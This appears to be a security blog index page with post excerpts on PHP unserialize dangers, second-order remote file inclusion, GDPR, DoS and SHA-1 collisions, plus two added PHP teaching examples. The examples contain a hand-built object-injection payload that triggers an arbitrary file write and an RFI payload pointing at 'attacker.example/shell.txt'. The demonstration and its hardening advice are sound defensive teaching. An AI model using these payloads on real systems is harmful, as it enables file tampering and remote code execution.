Why You Should Never Pass Untrusted Data to Unserialize When Writing PHP Code

In PHP, as in every other programming language used for web development, developers should avoid writing code that passes user-controlled input to dangerous functions. This is one of the basics of secure programming. Whenever a function has the capability to execute a dangerous action, it should either not receive ...
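The principle in the excerpt, shown on the function the post is about. This is an added example written for this page, not code from the original Netsparker post; the CacheEntry class, its property names and the file path are hypothetical, and the serialized string is constructed by hand to stand in for what an attacker would send in a cookie or POST body.

```php
<?php
// Added example (not from the original post). Class, property and file
// names are hypothetical; the payload is constructed to mimic attacker input.

declare(strict_types=1);

// A harmless-looking class that the application happens to have loaded.
// unserialize() will instantiate ANY defined class named in its input, so
// every magic method on every loaded class becomes reachable from the
// attacker's string.
class CacheEntry
{
    public string $path = '';
    public string $content = '';

    // Runs when the object is destroyed, including objects that unserialize()
    // built from untrusted input: an arbitrary file write for the attacker.
    public function __destruct()
    {
        if ($this->path !== '') {
            file_put_contents($this->path, $this->content);
        }
    }
}

// Constructed attacker payload. Written by hand (rather than via serialize())
// so that no CacheEntry object exists on the "attacker" side of this demo.
$target  = sys_get_temp_dir() . '/pwned.txt';
$payload = sprintf(
    'O:10:"CacheEntry":2:{s:4:"path";s:%d:"%s";s:7:"content";s:5:"owned";}',
    strlen($target),
    $target
);

// Vulnerable: the pattern the post warns against. A CacheEntry is created
// from the attacker's string and its destructor fires when $obj goes away.
function vulnerable(string $untrusted): void
{
    $obj = unserialize($untrusted);
    var_dump(get_class($obj));      // string(10) "CacheEntry"
}

// Hardened option 1: forbid object instantiation entirely. The object name
// is kept as a __PHP_Incomplete_Class stub whose magic methods never run.
function hardened(string $untrusted): void
{
    $obj = unserialize($untrusted, ['allowed_classes' => false]);
    var_dump(get_class($obj));      // string(22) "__PHP_Incomplete_Class"
}

// Hardened option 2 (preferred for new code): do not use PHP serialization
// for data that crosses a trust boundary. JSON carries no class names, so
// there is nothing to instantiate.
function hardenedJson(string $untrusted): ?array
{
    try {
        return json_decode($untrusted, true, 512, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return null;                // the attacker's payload is not JSON
    }
}

hardened($payload);
var_dump(file_exists($target));     // bool(false): nothing was written
var_dump(hardenedJson($payload));   // NULL

vulnerable($payload);
var_dump(file_exists($target));     // bool(true): the attacker's file exists
@unlink($target);
```

Run it with `php example.php` on PHP 7.4 or later. The `allowed_classes` option only blocks instantiation; it does not make `unserialize()` safe against malformed input or resource exhaustion, which is why the JSON path is the one to prefer for anything that arrives over the network.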
GDPR Article 32: Security of Data Processing

The EU General Data Protection Regulation (GDPR) is a regulation formulated by the European Union to strengthen and unify data protection for all individuals within the EU. It covers many subjects, such as Privacy by Design and Data Breaches. One section in particular, which applies to all those ...
[Embedded media: DEF CON 21 - Ming Chow - Abusing NoSQL Databases]

Application Level Denial of Service – An In-Depth Guide

Denial of Service attacks that bring down popular websites often involve thousands of hacked consumer devices and servers. While these attacks mainly aim to overwhelm the target system with traffic, in order to deny service to legitimate users, bugs at the Application Layer (Layer 7 in the OSI model) can ...
[Screenshot: the RFI vulnerability as reported in Netsparker Desktop]

Second-Order Remote File Inclusion (RFI) Vulnerability Introduction & Example

The main difference between a Remote File Inclusion (RFI) vulnerability and a second-order one is that in a second-order RFI the attacker does not receive an instant response from the web server, which makes it more difficult to detect. This is because the payload that the attacker uses to exploit the ...
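The two-request shape described in the excerpt, as an added example written for this page (not code from the original Netsparker post). The settings page, the profile store (an in-memory array standing in for a database), the theme parameter and the attacker host are all hypothetical; the include sink is returned as a string rather than executed so the script runs without network access.

```php
<?php
// Added example (not from the original post). Table, column, parameter and
// host names are hypothetical; the "database" is an in-memory array.

declare(strict_types=1);

$profiles = [];

// Request A (attacker-facing): a settings page stores the chosen theme.
// Nothing is included here, so the attacker gets a normal "saved" response
// and a scanner that only looks for an immediate effect sees nothing.
function saveTheme(array &$profiles, int $userId, string $theme): void
{
    $profiles[$userId] = ['theme' => $theme];   // stored verbatim; the sink is elsewhere
}

// Request B (a different page, or a later batch job): the stored value is
// turned into an include path. With allow_url_include=On, a stored
// "http://attacker.example/shell.txt?" is fetched and executed here; with it
// Off the same code still gives local file inclusion.
function vulnerableRender(array $profiles, int $userId): string
{
    $theme = $profiles[$userId]['theme'] ?? 'default';
    $path  = $theme . '/header.php';
    // include $path;   <- the real sink. Returned instead of executed so the
    //                     example can run offline.
    return $path;
}

// Hardened: a value is not trusted merely because it came back out of the
// database. The sink maps it through an allowlist and falls back to a known
// template, never to the user's string.
const THEMES = [
    'default' => __DIR__ . '/themes/default',
    'dark'    => __DIR__ . '/themes/dark',
];

function hardenedRender(array $profiles, int $userId): string
{
    $theme = $profiles[$userId]['theme'] ?? 'default';
    $dir   = THEMES[$theme] ?? THEMES['default'];
    return $dir . '/header.php';
}

// Constructed attack: the payload is stored in request A ...
saveTheme($profiles, 42, 'http://attacker.example/shell.txt?');

// ... and only reaches the dangerous function in request B.
echo vulnerableRender($profiles, 42), PHP_EOL;
// http://attacker.example/shell.txt?/header.php
// (the trailing "?" turns "/header.php" into a query string, so the
//  attacker's file is what the URL wrapper would fetch)

echo hardenedRender($profiles, 42), PHP_EOL;
// <script dir>/themes/default/header.php
```

The detection consequence follows directly from the code: a scanner that submits the payload to the settings page and inspects only that response sees a success message, because the include runs in a different request, possibly minutes later and on a different URL.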
The Equifax Breach – The Signs Were There

Whenever a big data breach happens – like the Equifax one – there is almost always a predictable order of subsequent events:
1. The breach happens.
2. The affected company announces it.
3. The news outlets pick up the story and make it known to the general public.
4. Security researchers wonder how the ...
Missed Black Hat or DEF CON? We've got you covered

Tags: blackhat, DEF CON
I'm sure lots of you are sad that Black Hat USA 2017 and DEF CON 25 are over. You had a hell of a time in Las Vegas, were given the opportunity to listen to some great talks and meet people who share the same interests. And of course, you've ...
[Image: XSS Tunnelling Tutorial]

Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls

Tags: developers, Hacking
Software and web developers, owners of the latest IoT gadgets and people who just like to surf the web at home have one thing in common: they are all protected by a firewall. Businesses typically protect their networks with hardware, dedicated and robu ...
Collision Based Hashing Algorithm Disclosure

In February 2017 a number of Google engineers created the first SHA-1 collision. Even though this hashing algorithm was already marked as deprecated by NIST in 2011, it is still widely used. What are Hash Collisions? A hash collision happens ...